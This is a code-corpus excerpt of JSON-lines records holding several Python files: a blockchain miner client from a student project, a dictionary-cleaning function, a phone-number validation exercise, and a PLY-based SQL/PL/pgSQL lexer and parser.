\"\"\n else:\n repl = _(\"(typing comparison appears here)\")\n repl = \"
    %s
    \" % repl\n return re.sub(\"\\[\\[type:.+?\\]\\]\", repl, txt)\n","sub_path":"Preview.py","file_name":"Preview.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"112110170","text":"import pprint, uuid, subprocess, json, threading, sys\nfrom crypto3002 import *\nfrom blockchain3002 import *\nfrom common3002 import *\n\nunminedTransactionList = [] #Transactions not yet on the blockchain\nblockchain = [] #Transactions on the blockchain\n\n#Easiest possible initial target, will mine in one attempt\nglobal target\ntarget = 2**256\n\n#Lachlan Newman\n#Isaac Ward\n#Receives any data from the server\ndef receive(ssl_sock, stopRecv):\n #Will be ran as a continuously looping thread that waits for received transmissions\n while not stopRecv(): \n #Load transmission\n transmission = json.loads(ssl_sock.recv(4096).decode()) #Up to 4KB of data\n \n #If nothing in loaded transmission, retry\n if not transmission:\n break\n \n #Announce newly received target\n header = transmission['header']\n print(\"'\" + header + \"' received.\")\n\n #Obtain header to decide appropriate course of action\n #Only accepted headers FROM server TO miner are:\n #MINING COMPLETE\n #NEW TARGET\n #TRANSACTION\n \n if(header == \"MINING COMPLETE\"):\n #Add any mining completes to the global list of mining completes\n blockchain.append(makeBlock(blockchain, transmission['data']))\n \n #Remove this from the unmined list, as it has now been mined\n t = transmission['data']['transaction']\n if t in unminedTransactionList: unminedTransactionList.remove(t)\n \n elif(header == \"NEW TARGET\"):\n #A new network target has been recalculated, adjust local targets accordingly\n global target\n target = transmission['data']\n \n elif(header == \"TRANSACTION\"):\n #A transaction has been observed, add it to the list of unmined transactions\n unminedTransactionList.append(transmission['data'])\n \n else:\n #Unrecognised header\n print(\"Unrecognised header '\" + header + \"', discarding transmission.\")\n\n#Lachlan Newman\n#Transmitting any data to the server\ndef transmit(ssl_sock, data, header):\n #Only accepted headers FROM miner TO server are:\n #MINING COMPLETE\n \n #Build transmission as a dict\n transmission = {}\n transmission['data'] = data\n transmission['header'] = header\n \n #Send transmission\n print(\"Transmitting to server.\")\n ssl_sock.send(json.dumps(transmission).encode()) \n \n\n#Isaac R. Ward\n#Print out a list of transactions in the working directory that can be mined\ndef printMinableTransactions():\n print(\"\")\n\n #Prints every unmined transaction with ID's increasing monotonically from 0\n ID = 0\n for ut in unminedTransactionList:\n print(json.dumps(ut, indent = 4) + \"transaction \" + str(ID) + \"\\n\")\n ID = ID + 1\n \n if ID == 0:\n print(\"There are currently no unmined transactions.\\n\")\n else:\n print(\"There are currently \" + str(ID) + \" unmined transaction(s), with ID's 0 through to \" + str(ID - 1) + \".\\n\")\n \n#Isaac R. Ward\n#Print out a list of transactions in the working directory that can be mined using file names rather than public keys where possible\ndef printMinableTransactionsWithFileNames(fileKeyPairs):\n print(\"\")\n\n #Prints every unmined transaction with ID's increasing monotonically from 0\n ID = 0\n for ut in unminedTransactionList:\n tmpSrcPubKey = ut['srcPubKey']\n tmpDestPubKey = ut['destPubKey']\n \n for p in fileKeyPairs:\n if p['string'] == ut['srcPubKey']:\n ut['srcPubKey'] = p['file']\n if p['string'] == ut['destPubKey']:\n ut['destPubKey'] = p['file']\n \n print(json.dumps(ut, indent = 4) + \"transaction \" + str(ID) + \"\\n\")\n ID = ID + 1\n \n ut['srcPubKey'] = tmpSrcPubKey\n ut['destPubKey'] = tmpDestPubKey\n \n if ID == 0:\n print(\"There are currently no unmined transactions.\\n\")\n else:\n print(\"There are currently \" + str(ID) + \" unmined transaction(s), with ID's 0 through to \" + str(ID - 1) + \".\\n\")\n \n#Isaac R. Ward \n#Called when the option m is selected form the command line, gets the information required to mine\ndef mine(minerPublicKey, publicPairList):\n #Select a transaction to mine, and load it into a dict for verifying & mining\n ID = input(\"Input ID of transaction to mine:\\n\") \n if((int(ID) > len(unminedTransactionList) - 1) or not ID.isdigit()):\n #Out of bounds\n print(\"No transaction matches that ID.\\n\")\n return -1\n \n transaction = unminedTransactionList[int(ID)]\n \n #Trying to find the sender's public key from the public keys folder\n srcPublicFile = \"\"\n print(\"Attempting to locate a public key from the 'publicKeys' folder that matches the sender's public key.\")\n for p in publicPairList:\n if p['string'] == transaction['srcPubKey']:\n srcPublicFile = p['file']\n \n #Announce to user that a matching public key was or was not found\n if srcPublicFile == \"\":\n print(\"A matching public key could not be found as a .pem file in the 'publicKeys' folder (add this file to the folder and use the 'r' option before trying again). The message cannot be verified and will not be mined.\")\n return -1\n else:\n print(\"A matching public key was found in the file: \" + srcPublicFile)\n \n #Verify if the transaction was legitamitely sent from the given sender by comparing against the message signature \n if(verifyTransaction(transaction, \"publicKeys/\" + srcPublicFile)):\n print(\"The selected transaction has been successfully verified.\")\n \n #If verification succeeds, begin the mining process in a new thread, monitor if anyone on the network\n #has already mined the transaction simultaneously, and cancel mining if so\n metrics = {} #count, time, nonce, digest\n metrics['c'] = 0 \n metrics['t'] = 0 \n metrics['n'] = 0\n metrics['d'] = \"\"\n \n #lambda function used to stop mining thread when appropriate\n stop = False\n global target\n miningThread = threading.Thread(target=proofOfWork, args=(transaction, target, metrics, lambda: stop))\n miningThread.start()\n \n #Check that nobody has mined the same transaction\n progress = 0\n progressIcon = [\"- \", \"\\ \", \"| \", \"/ \", \"- \", \"\\ \", \"| \", \"/ \"]\n #progressIcon = [\"-=======\", \"=-======\", \"==-=====\", \"===-====\", \"====-===\", \"=====-==\", \"======-=\", \"=======-\", \"======-=\", \"=====-==\", \"====-===\", \"===-====\", \"==-=====\", \"=-======\"]\n \n while(miningThread.isAlive()):\n #Indicate to user that mining is occuring\n print(\"\\rMining \" + progressIcon[int(progress/100) % len(progressIcon)], end=\"\")\n progress = progress + 1\n \n for b in blockchain:\n if b['transaction'] == transaction:\n #This means a mining complete signal has already occured for the transaction we are mining\n stop = True #Will stop the mining thread\n \n #Announce outcome to user\n print(\"\\rAnother miner has completed mining this transaction already;\\ncancelling mining & removing transaction from unmined transactions list.\\n\")\n unminedTransactionList.remove(transaction)\n \n return -1\n \n #Neaten up command line output\n print(\"\\r\", end=\"\")\n \n #If out of this loop, must have successfully been the first person on the network to mine transaction\n #Print metrics\n print(\"Mined w/ nonce \" + str(metrics['n']) + \" in time: \" + str(metrics['t'])) \n \n #Announce to user\n print(\"\\rRemoving transaction from unmined transactions list.\\n\")\n unminedTransactionList.remove(transaction)\n \n #Add the target at this time to be written into the blockchain\n metrics['target'] = target\n \n successfulMine = {}\n successfulMine['miner'] = minerPublicKey\n successfulMine['metrics'] = metrics\n successfulMine['transaction'] = transaction\n \n #Return this information\n return successfulMine \n \n else:\n #If not verifiable, do not mine as message has been altered with and could be fraudulent\n print(\"Transaction cannot be verified and will not be mined.\\n\") \n \n #Return symbolic -1 as error \n return -1\n \n#Isaac R. Ward\n#Repeatedly ran through to get user input\ndef mainProgramLoop(ssl_sock, minerPublicKey):\n #Create an dictionary that maps user's public keys to the filenames that they are held in\n publicPairList = getPublicPairs()\n \n for p in publicPairList:\n if p['file'] == minerPublicKey:\n publicKeyString = p['string']\n\n while(True):\n #Prompt the user to do an action\n instructions = \"Options: \\n\\t'r' to read any changes made to the 'publicKeys' folder, \\n\\t'l' to list unmined transactions by ID, \\n\\t'lf' to list unmined transactions by ID with .pem file names instead of key strings (based off the contents of the 'publicKeys' folder), \\n\\t'm' to select a transaction to mine based on ID, \\n\\t't' to view the target, \\n\\t'q' to quit.\\n\"\n option = input(instructions)\n while(option != \"r\" and option != \"l\" and option != \"m\" and option != \"q\" and option != \"lf\" and option != \"t\"):\n print(\"Unrecognised option.\")\n option = input(instructions)\n\n #Take action depending on option\n if(option == \"l\"):\n #List unverified, minable transactions received by the wallet\n printMinableTransactions()\n \n elif(option == \"r\"):\n #Re read the publicKeys folder\n publicPairList = getPublicPairs();\n \n elif(option == \"lf\"):\n #List unmined transactions using filenames where possible\n printMinableTransactionsWithFileNames(publicPairList)\n \n elif(option == \"m\"):\n #Begin the process of mining, -1 indicates unverifiable or unsuccessfulmine\n info = mine(publicKeyString, publicPairList)\n if(info != -1):\n #Verified and mined\n transmit(ssl_sock, info, \"MINING COMPLETE\")\n \n elif(option == \"t\"):\n #User has requested to view the target\n global target #Using the global target, not creating some local variable\n print(\"The current network target is:\\n\" + str(target) + \"\\nA hash digest LESS THAN this number is required to beat it.\\n\")\n \n elif(option == \"q\"):\n #Quit\n break\n\n#Isaac R. Ward\n#Gets the public key with which the mines will be accredited with\ndef getMinerPublicKey():\n #Get the miner's public key base on a file in the public keys file\n instructions = \"Enter the name of the .pem file holding the public key that will be acredited with this session's mines:\\n\"\n publicKeyFile = input(instructions)\n while not os.path.isfile(\"publicKeys/\" + publicKeyFile):\n print(\"File not found. Please try again.\")\n publicKeyFile = input(instructions)\n\n return publicKeyFile\n\n#Lachlan Newman\n#Isaac R. Ward\nif __name__ == '__main__':\n #Create a ssl socket connection to server\n ssl_sock = createSSLSocket()\n \n #Use lambda function to close thread\n stopRecv = False\n \n #Gets the public key with which the mines will be accredited with\n minerPublicKey = getMinerPublicKey()\n \n #Start the receiving thread, as we must continuously monitor for incoming messages on the given socket\n receiveThread = threading.Thread(target=receive, args=(ssl_sock, lambda: stopRecv))\n #Setting a thread to be a daemon ensures it will end when main does\n receiveThread.daemon = True\n receiveThread.start()\n \n #Enter the main user control loop\n mainProgramLoop(ssl_sock, minerPublicKey)\n \n print(\"Ending user input thread.\")\n \n stopRecv = True\n \n print(\"Ending mining program.\")\n\n sys.exit()\n\n \n \n\n","sub_path":"build 01-06-17 2/miner.py","file_name":"miner.py","file_ext":"py","file_size_in_byte":12332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"50242366","text":"\n\ndef refine_parameters(data):\n '''Refine the parameters of a dictionary\n\n Returns:\n Return a dictionary of cleaned input\n '''\n clean_dict = {}\n\n # Write your code here.\n\n #We will iterate over the keys in the given json\n for key in data:\n \ttry:\n \t\tclean_dict[key] = int(data[key])\n \texcept:\n \t\tif type(data[key]) == dict:\n \t\t\t# Recursive case if there is another dictionary within the answer\n \t\t\tprint(data[str(key)])\n \t\t\tclean_dict[key] = refine_parameters(data[str(key)])\n\n \t\telif type(data[key]) == list or type(data[key]) == tuple:\n \t\t\t# Case if there is an array, we need to refine all the parameters\n \t\t\tclean_dict[key] = []\n \t\t\tfor item in data[key]:\n \t\t\t\ttry:\n \t\t\t\t\tclean_dict[key].append(int(item))\n \t\t\t\texcept:\n \t\t\t\t\tclean_dict[key].append(item)\n \t\telif data[key] == 'false':\n \t\t\tclean_dict[key] = False\n \t\telif data[key] == 'true':\n \t\t\tclean_dict[key] = True\n \t\telse:\n \t\t\tclean_dict[key] = data[key]\n\n return clean_dict\n","sub_path":"python_solution.py","file_name":"python_solution.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"94810028","text":"def isPhoneNumber(text):\n if len(text) != 12: # 12 character string y/n\n return False\n for i in range(0, 3): # Are the first 3 digits\n if not text[i].isdecimal():\n return False\n if text[3] != '-': # Is there a dash after 3 character\n return False\n if i in range(4, 7): # Are the next 3 characters digits\n if not text[i].isdecimal():\n return False\n if text[7] != '-': # Is there a dash after the 7th character\n return False\n for i in range(8, 12): # Are the last characters all decimal\n if not text[i].isdecimal():\n return False\n return True\n \nprint('415-555-4242 is a phone number:')\nprint(isPhoneNumber('415-555-4242'))\nprint('Moshi moshi is a phone number:')\nprint(isPhoneNumber('Moshi moshi')) \n \n","sub_path":"ABS/part_2/isPhoneNumber.py","file_name":"isPhoneNumber.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217671869","text":"import ply.lex as lex\nimport re\nfrom parse.errors import Error as our_error\nfrom parse.expressions.expressions_math import *\nfrom parse.expressions.expressions_base import *\nfrom parse.expressions.expressions_trig import *\nfrom parse.sql_common.sql_general import *\nfrom parse.sql_ddl.create import *\nfrom parse.sql_ddl.alter import *\nfrom parse.sql_dml.insert import *\nfrom parse.sql_ddl.drop import *\nfrom parse.sql_dml.select import *\nfrom parse.sql_dml.update import *\nfrom parse.sql_dml.delete import *\nfrom treeGraph import *\nfrom parse.symbol_table import *\nfrom parse.plpgsql.function import *\nfrom parse.plpgsql.declaration import *\nfrom parse.plpgsql.index import *\n\nfrom parse.plpgsql.control import *\nfrom parse.functions.functions_aggregate import *\nfrom ply.lex import LexToken\n# ===========================================================================================\n# ==================================== LEXICAL ANALYSIS ==================================\n# ===========================================================================================\nreserved = {\n 'smallint' : 'SMALLINT',\n 'integer' : 'INTEGER',\n 'bigint' : 'BIGINT',\n 'decimal' : 'DECIMAL',\n 'numeric' : 'NUMERIC',\n 'real' : 'REAL',\n 'double' : 'DOUBLE',\n 'precision' : 'PRECISION',\n 'money' : 'MONEY',\n 'caracter' : 'CARACTER',\n 'varying' : 'VARYING',\n 'varchar' : 'VARCHAR',\n 'character' : 'CHARACTER',\n 'char' : 'CHAR',\n 'text' : 'TEXT',\n 'timestamp' : 'TIMESTAMP',\n 'date' : 'DATE',\n 'time' : 'TIME',\n 'interval' : 'INTERVAL',\n 'year' : 'YEAR',\n 'month' : 'MONTH',\n 'day' : 'DAY',\n 'hour' : 'HOUR',\n 'minute' : 'MINUTE',\n 'second' : 'SECOND',\n 'extract' : 'EXTRACT',\n 'date_part' : 'DATE_PART',\n 'now' : 'NOW',\n 'current_date' : 'CURRENT_DATE',\n 'current_time' : 'CURRENT_TIME',\n 'boolean' : 'BOOLEAN',\n 'between' : 'BETWEEN',\n 'symmetric' : 'SYMMETRIC',\n 'in' : 'IN',\n 'like' : 'LIKE',\n 'ilike' : 'ILIKE',\n 'similar' : 'SIMILAR',\n 'is' : 'IS',\n 'null' : 'NULL',\n 'not' : 'NOT',\n 'and' : 'AND',\n 'or' : 'OR',\n 'select' : 'SELECT',\n 'from' : 'FROM',\n 'where' : 'WHERE',\n 'create' : 'CREATE',\n 'type' : 'TYPE',\n 'as' : 'AS',\n 'enum' : 'ENUM',\n 'replace' : 'REPLACE',\n 'database' : 'DATABASE',\n 'if' : 'IF',\n 'exists' : 'EXISTS',\n 'owner' : 'OWNER',\n 'mode' : 'MODE',\n 'show' : 'SHOW',\n 'databases' : 'DATABASES',\n 'alter' : 'ALTER',\n 'rename' : 'RENAME',\n 'to' : 'TO',\n 'drop' : 'DROP',\n 'current_user' : 'CURRENT_USER',\n 'session_user' : 'SESSION_USER',\n 'table' : 'TABLE',\n 'default' : 'DEFAULT',\n 'constraint' : 'CONSTRAINT',\n 'unique' : 'UNIQUE',\n 'check' : 'CHECK',\n 'primary' : 'PRIMARY',\n 'key' : 'KEY',\n 'references' : 'REFERENCES',\n 'foreign' : 'FOREIGN',\n 'add' : 'ADD',\n 'column' : 'COLUMN',\n 'set' : 'SET',\n 'inherits' : 'INHERITS',\n 'insert' : 'INSERT',\n 'into' : 'INTO',\n 'values' : 'VALUES',\n 'update' : 'UPDATE',\n 'delete' : 'DELETE',\n 'distinct' : 'DISTINCT',\n 'group' : 'GROUP',\n 'by' : 'BY',\n 'having' : 'HAVING',\n 'unknown' : 'UNKNOWN',\n 'count' : 'COUNT',\n 'min' : 'MIN',\n 'max' : 'MAX',\n 'sum' : 'SUM',\n 'avg' : 'AVG',\n 'abs' : 'ABS',\n 'cbrt' : 'CBRT',\n 'ceil' : 'CEIL',\n 'ceiling' : 'CEILING',\n 'degrees' : 'DEGREES',\n 'div' : 'DIV',\n 'exp' : 'EXP',\n 'factorial' : 'FACTORIAL',\n 'floor' : 'FLOOR',\n 'gcd' : 'GCD',\n 'lcm' : 'LCM',\n 'ln' : 'LN',\n 'log' : 'LOG',\n 'log10' : 'LOG10',\n 'min_scale' : 'MIN_SCALE',\n 'mod' : 'MOD',\n 'pi' : 'PI',\n 'power' : 'POWER',\n 'radians' : 'RADIANS',\n 'round' : 'ROUND',\n 'scale' : 'SCALE',\n 'sign' : 'SIGN',\n 'sqrt' : 'SQRT',\n 'trim_scale' : 'TRIM_SCALE',\n 'trunc' : 'TRUNC',\n 'width_bucket' : 'WIDTH_BUCKET',\n 'random' : 'RANDOM',\n 'setseed' : 'SETSEED',\n 'acos' : 'ACOS',\n 'acosd' : 'ACOSD',\n 'asin' : 'ASIN',\n 'asind' : 'ASIND',\n 'atan' : 'ATAN',\n 'atand' : 'ATAND',\n 'atan2' : 'ATAN2',\n 'atan2d' : 'ATAN2D',\n 'cos' : 'COS',\n 'cosd' : 'COSD',\n 'cot' : 'COT',\n 'cotd' : 'COTD',\n 'sin' : 'SIN',\n 'sind' : 'SIND',\n 'tan' : 'TAN',\n 'tand' : 'TAND',\n 'sinh' : 'SINH',\n 'cosh' : 'COSH',\n 'tanh' : 'TANH',\n 'asinh' : 'ASINH',\n 'acosh' : 'ACOSH',\n 'atanh' : 'ATANH',\n 'length' : 'LENGTH',\n 'substring' : 'SUBSTRING',\n 'trim' : 'TRIM',\n 'get_byte' : 'GET_BYTE',\n 'md5' : 'MD5',\n 'set_byte' : 'SET_BYTE',\n 'sha256' : 'SHA256',\n 'substr' : 'SUBSTR',\n 'convert' : 'CONVERT',\n 'encode' : 'ENCODE',\n 'decode' : 'DECODE',\n 'any' : 'ANY',\n 'all' : 'ALL',\n 'some' : 'SOME',\n 'asc' : 'ASC',\n 'desc' : 'DESC',\n 'case' : 'CASE',\n 'when' : 'WHEN',\n 'then' : 'THEN',\n 'else' : 'ELSE',\n 'end' : 'END',\n 'greatest' : 'GREATEST',\n 'least' : 'LEAST',\n 'order' : 'ORDER',\n 'limit' : 'LIMIT',\n 'offset' : 'OFFSET',\n 'union' : 'UNION',\n 'intersect' : 'INTERSECT',\n 'except' : 'EXCEPT',\n 'inner' : 'INNER',\n 'left' : 'LEFT',\n 'right' : 'RIGHT',\n 'full' : 'FULL',\n 'outer' : 'OUTER',\n 'join' : 'JOIN',\n 'on' : 'ON',\n 'using' : 'USING',\n 'natural' : 'NATURAL',\n 'first' : 'FIRST',\n 'last' : 'LAST',\n 'nulls' : 'NULLS',\n 'use' : 'USE',\n 'constant' : 'CONSTANT',\n 'collate' : 'COLLATE',\n 'function' : 'FUNCTION',\n 'begin' : 'BEGIN',\n 'return' : 'RETURN',\n 'returns' : 'RETURNS',\n 'alias' : 'ALIAS',\n 'for' : 'FOR',\n 'language' : 'LANGUAGE',\n 'out' : 'OUT',\n 'declare' : 'DECLARE',\n 'rowtype' : 'ROWTYPE',\n 'record' : 'RECORD',\n 'prepare' : 'PREPARE',\n 'perform' : 'PERFORM',\n 'found' : 'FOUND',\n 'raise' : 'RAISE',\n 'no_data_found' : 'NO_DATA_FOUND',\n 'too_many_rows' : 'TOO_MANY_ROWS',\n 'execute' : 'EXECUTE',\n 'get' : 'GET',\n 'notice' : 'NOTICE',\n 'elsif' : 'ELSIF',\n 'exception' : 'EXCEPTION',\n 'plpgsql' : 'PLPGSQL',\n 'diagnostics' : 'DIAGNOSTICS',\n 'inout' : 'INOUT',\n 'cascade' : 'CASCADE',\n 'restrict' : 'RESTRICT',\n 'index' : 'INDEX',\n 'hash' : 'HASH',\n 'procedure' : 'PROCEDURE',\n 'concurrently' : 'CONCURRENTLY',\n 'tablespace' : 'TABLESPACE',\n 'attach' : 'ATTACH',\n 'partition' : 'PARTITION',\n 'depends' : 'DEPENDS',\n 'extension' : 'EXTENSION',\n 'reset' : 'RESET',\n 'statistics' : 'STATISTICS',\n 'lower' : 'LOWER',\n \n}\n\ntokens = [\n 'PARA',\n 'PARC',\n 'CORCHA',\n 'CORCHC',\n 'PUNTO',\n 'COMA',\n 'PUNTOCOMA',\n 'DOSPUNTOS',\n 'MAS',\n 'MENOS',\n 'POR',\n 'DIAGONAL',\n 'EXPONENCIANCION',\n 'PORCENTAJE',\n 'MAYOR',\n 'MENOR',\n 'IGUAL',\n 'MAYORQ',\n 'MENORQ',\n 'DIFERENTE',\n 'ENTERO',\n 'FLOAT',\n 'TEXTO',\n 'FECHA_HORA',\n 'PATTERN_LIKE',\n 'BOOLEAN_VALUE',\n 'ID',\n 'SQUARE_ROOT',\n 'CUBE_ROOT',\n 'AMPERSON',\n 'NUMERAL',\n 'PRIME',\n 'SHIFT_L',\n 'SHIFT_R',\n 'DOLLAR',\n] +list(reserved.values()) \n\nt_PARA = r'\\('\nt_PARC = r'\\)'\nt_CORCHA = r'\\['\nt_CORCHC = r'\\]'\nt_PUNTO = r'\\.'\nt_COMA = r'\\,'\nt_PUNTOCOMA = r'\\;'\nt_DOSPUNTOS = r'\\:'\nt_MAS = r'\\+'\nt_MENOS = r'\\-'\nt_POR = r'\\*'\nt_DIAGONAL = r'\\/'\nt_EXPONENCIANCION = r'\\^'\nt_PORCENTAJE = r'%'\nt_DOLLAR = r'\\$'\nt_MAYOR = r'>'\nt_MENOR = r'<'\nt_IGUAL = r'='\nt_MAYORQ = r'>='\nt_MENORQ = r'<='\nt_SQUARE_ROOT = r'\\|'\nt_CUBE_ROOT = r'\\|\\|'\nt_AMPERSON = r'\\&'\nt_NUMERAL = r'\\#'\nt_PRIME = r'\\~'\nt_SHIFT_L = r'<<'\nt_SHIFT_R = r'>>'\n\n# ignored regular expressions\nt_ignore = \" \\t\"\nt_ignore_COMMENT = r'\\-\\-.*'\nt_ignore_COMMENTMULTI = r'(/\\*(.|\\n)*?\\*/)|(//.*)'\n\n\ndef t_DIFERENTE(t):\n r'((<>)|(!=))'\n t.type = reserved.get(t.value, 'DIFERENTE')\n return t\n\n\ndef t_FLOAT(t):\n r'((\\d+\\.\\d*)((e[\\+-]?\\d+)?)|(\\d*e[\\+-]?\\d+))'\n t.value = float(t.value)\n return t\n\n\ndef t_ENTERO(t):\n r'\\d+'\n t.value = int(float(t.value))\n return t\n\n\ndef t_FECHA_HORA(t):\n r'\\'\\d{4}-[0-1]?\\d-[0-3]?\\d [0-2]\\d:[0-5]\\d:[0-5]\\d\\''\n t.value = t.value[1:-1]\n t.type = reserved.get(t.value, 'FECHA_HORA')\n return t\n\n\ndef t_PATTERN_LIKE(t):\n r'\\'\\%.*\\%\\''\n t.value = t.value[2:-2]\n t.type = reserved.get(t.value, 'PATTERN_LIKE')\n return t\n\n\ndef t_TEXTO(t):\n r'\\'([^\\\\\\n]|(\\\\.))*?\\''\n t.value = t.value[1:-1]\n t.type = 'TEXTO'\n return t\n\n\ndef t_BOOLEAN_VALUE(t):\n r'((false)|(true))'\n t.value = t.value.lower()\n t.type = reserved.get(t.value, 'BOOLEAN_VALUE')\n return t\n\n\ndef t_ID(t):\n r'[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value.lower(), 'ID')\n return t\n\n\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += t.value.count(\"\\n\")\n\n\ndef t_error(t):\n err = Error(t.lineno, t.lexpos, ErrorType.LEXICAL, 'Ilegal character \\'' + t.value[0] + '\\'')\n errorsList.append(err)\n t.lexer.skip(1)\n\n\nlexer = lex.lex(debug=False, reflags=re.IGNORECASE)\n\n# ===========================================================================================\n# ==================================== SYNTACTIC ANALYSIS ==================================\n# ===========================================================================================\n\nstart = 'init'\n\nprecedence = (\n\n # Arthmetic\n ('left', 'MAS', 'MENOS'),\n ('left', 'POR', 'DIAGONAL'),\n ('left', 'EXPONENCIANCION'),\n ('right', 'UMENOS'),\n ('right', 'UMAS'),\n # Relational\n ('left', 'MENOR', 'MAYOR', 'IGUAL', 'MENORQ', 'MAYORQ'),\n # logic\n ('left', 'OR'),\n ('left', 'AND'),\n ('right', 'NOT'),\n ('left', 'AS')\n)\n\n\ndef p_init(t):\n ''' init : statements'''\n t[0] = t[1]\n\n\n# ===================================== SQL =====================================\n\ndef p_statements(t):\n ''' statements : statements statement '''\n t[1].append(t[2])\n t[0] = t[1]\n\n\ndef p_statements2(t):\n ''' statements : statement '''\n t[0] = [t[1]]\n\n\ndef p_statement(t):\n '''statement : stm_show PUNTOCOMA\n | stm_create PUNTOCOMA\n | stm_alter PUNTOCOMA\n | stm_use_db PUNTOCOMA\n | stm_select PUNTOCOMA\n | stm_insert PUNTOCOMA\n | stm_update PUNTOCOMA\n | stm_delete PUNTOCOMA\n | stm_drop PUNTOCOMA\n | stm_select UNION all_opt stm_select PUNTOCOMA\n | stm_select INTERSECT all_opt stm_select PUNTOCOMA\n | stm_select EXCEPT all_opt stm_select PUNTOCOMA\n | asig_basica PUNTOCOMA\n | stm_perform PUNTOCOMA \n | stm_begin PUNTOCOMA\n | stm_if PUNTOCOMA \n | stm_create_function PUNTOCOMA \n | stm_execute PUNTOCOMA \n | stm_get PUNTOCOMA \n | stm_drop_function PUNTOCOMA\n | stm_index PUNTOCOMA\n | stm_drop_index PUNTOCOMA\n | stm_alter_index PUNTOCOMA\n | stm_create_procedure PUNTOCOMA\n | stm_drop_procedure PUNTOCOMA \n '''\n\n # | stm_select PUNTOCOMA\n # | stm_select UNION all_opt stm_select\n # | stm_select INTERSECT all_opt stm_select\n # | stm_select EXCEPT all_opt\n try:\n if len(t) == 3:\n punteroinicio(t[1].graph_ref)\n except:\n print(\"falta parametro graph_ref\")\n if len(t) == 3:\n t[0] = t[1]\n else:\n token_op = t.slice[2]\n graph_ref = None\n if token_op.type == 'UNION':\n childsProduction = addNotNoneChild(t, [1, 3, 4])\n graph_ref = graph_node(str(\"stm_union\"), [t[1], t[2], t[3], t[4]], childsProduction)\n punteroinicio(graph_ref)\n addCad(\"**\\** ::= \\ tUnion \\ \\ \")\n t[0] = Union(t[1], t[4], True if t[3] is not None else False, token_op.lineno, token_op.lexpos, graph_ref)\n if token_op.type == 'INTERSECT':\n childsProduction = addNotNoneChild(t, [1, 3, 4])\n graph_ref = graph_node(str(\"stm_intersect\"), [t[1], t[2], t[3], t[4]], childsProduction)\n punteroinicio(graph_ref)\n addCad(\"**\\** ::= \\ tIntersect \\ \\ \")\n t[0] = Intersect(t[1], t[4], True if t[3] is not None else False, token_op.lineno, token_op.lexpos, graph_ref)\n if token_op.type == 'EXCEPT':\n childsProduction = addNotNoneChild(t, [1, 3, 4])\n graph_ref = graph_node(str(\"stm_except\"), [t[1], t[2], t[3], t[4]], childsProduction)\n punteroinicio(graph_ref)\n addCad(\"**\\** ::= \\ tExcept \\ \\ \")\n t[0] = Except(t[1], t[4], True if t[3] is not None else False, token_op.lineno, token_op.lexpos, graph_ref)\n\n\ndef p_statement_error(t):\n '''statement : error PUNTOCOMA\n '''\n token = t.slice[1]\n t[0] = Error(token.lineno, token.lexpos, ErrorType.SYNTAX, 'Ilegal token ' + str(token.lineno))\n\n\n#################\n# Parte de PGSQL\n\n\ndef p_asig_basica(t):\n '''asig_basica : ID sig_asignacion valor_asignacion\n ''' \n childsProduction = addNotNoneChild(t,[2,3])\n graph_ref = graph_node(str(\"asig_basica\"), [t[1], t[2],t[3]] , childsProduction)\n addCad(\"**\\** ::= tIdentifier \\ \\ \")\n t[0] = Declaration(t[1], False, None, True, t[3], None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_sig_asignacion(t):\n '''sig_asignacion : DOSPUNTOS IGUAL\n | IGUAL'''\n if len(t) == 3:\n graph_ref = graph_node(str(t[1] + \" \" + t[2]))\n addCad(\"**\\** ::= tDospuntos tIgual \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 2:\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tIgual \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n\ndef p_valor_asignacion(t):\n '''valor_asignacion : expression\n | PARA statements_sql PARC'''\n if len(t) == 2:\n #NoDEScomentar\n #childsProduction = addNotNoneChild(t,[1])\n #graph_ref = graph_node(str(\"expression\"), [t[1]] , childsProduction)\n addCad(\"**\\** ::= \\ \")\n #t[1].graph_ref = graph_ref\n t[0] = t[1]\n ##### \n elif len(t) == 4:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"valor_asignacion\"), [t[1], t[2], t[3]],childsProduction )\n addCad(\"**\\** ::= '(' \\ ')' \")\n t[2].graph_ref = graph_ref\n t[0] = t[2]\n\n\ndef p_stm_perform(t):\n '''stm_perform : PERFORM ID PARA TEXTO COMA ID PARC '''\n\n if len(t) == 8:\n graph_ref = graph_node(str(\"stm_perform\"), [t[1], t[2], t[3], t[4], t[5], t[6],t[7]] ,[])\n addCad(\"**\\** ::= tPerform tIdentifier PARA tTexto ',' tIdentifier ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #####\n else:\n t[0]=None\n\n\n\ndef p_stm_if(t):\n '''stm_if : IF condition THEN if_inst elsif_opt else_opt END IF '''\n childsProduction = addNotNoneChild(t,[2,6])\n lista = None\n if t[4] != None:\n lista = t[4][0]\n childsProduction.append(lista.graph_ref)\n lista2 = None\n if t[5] != None:\n lista2 = t[5]\n childsProduction.append(lista2.graph_ref)\n graph_ref = graph_node(str(\"stm_if\"), [t[1], t[2], t[3], lista,lista2,t[6],t[7],t[8]], childsProduction)\n addCad(\"**\\** ::= tIf \\ THEN [\\] [\\] [\\] tEnd tIf ';' \")\n t[0] = IfNode(t[2], t[4], t[5], t[6], t.slice[1].lineno, t.slice[1].lexpos,graph_ref)\n\ndef p_condition(t):\n '''condition : NOT FOUND\n | predicateExpression \n '''\n\n\n if len(t) == 3:\n graph_ref = graph_node(str(\"condition\"), [t[1], t[2]],[])\n addCad(\"**\\** ::= tNot tFound \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 2:\n addCad(\"**\\** ::= [\\] \")\n t[0] = t[1]\n #print(t)\n\n\n\ndef p_elsif_opt(t):\n '''elsif_opt : elsif_opt 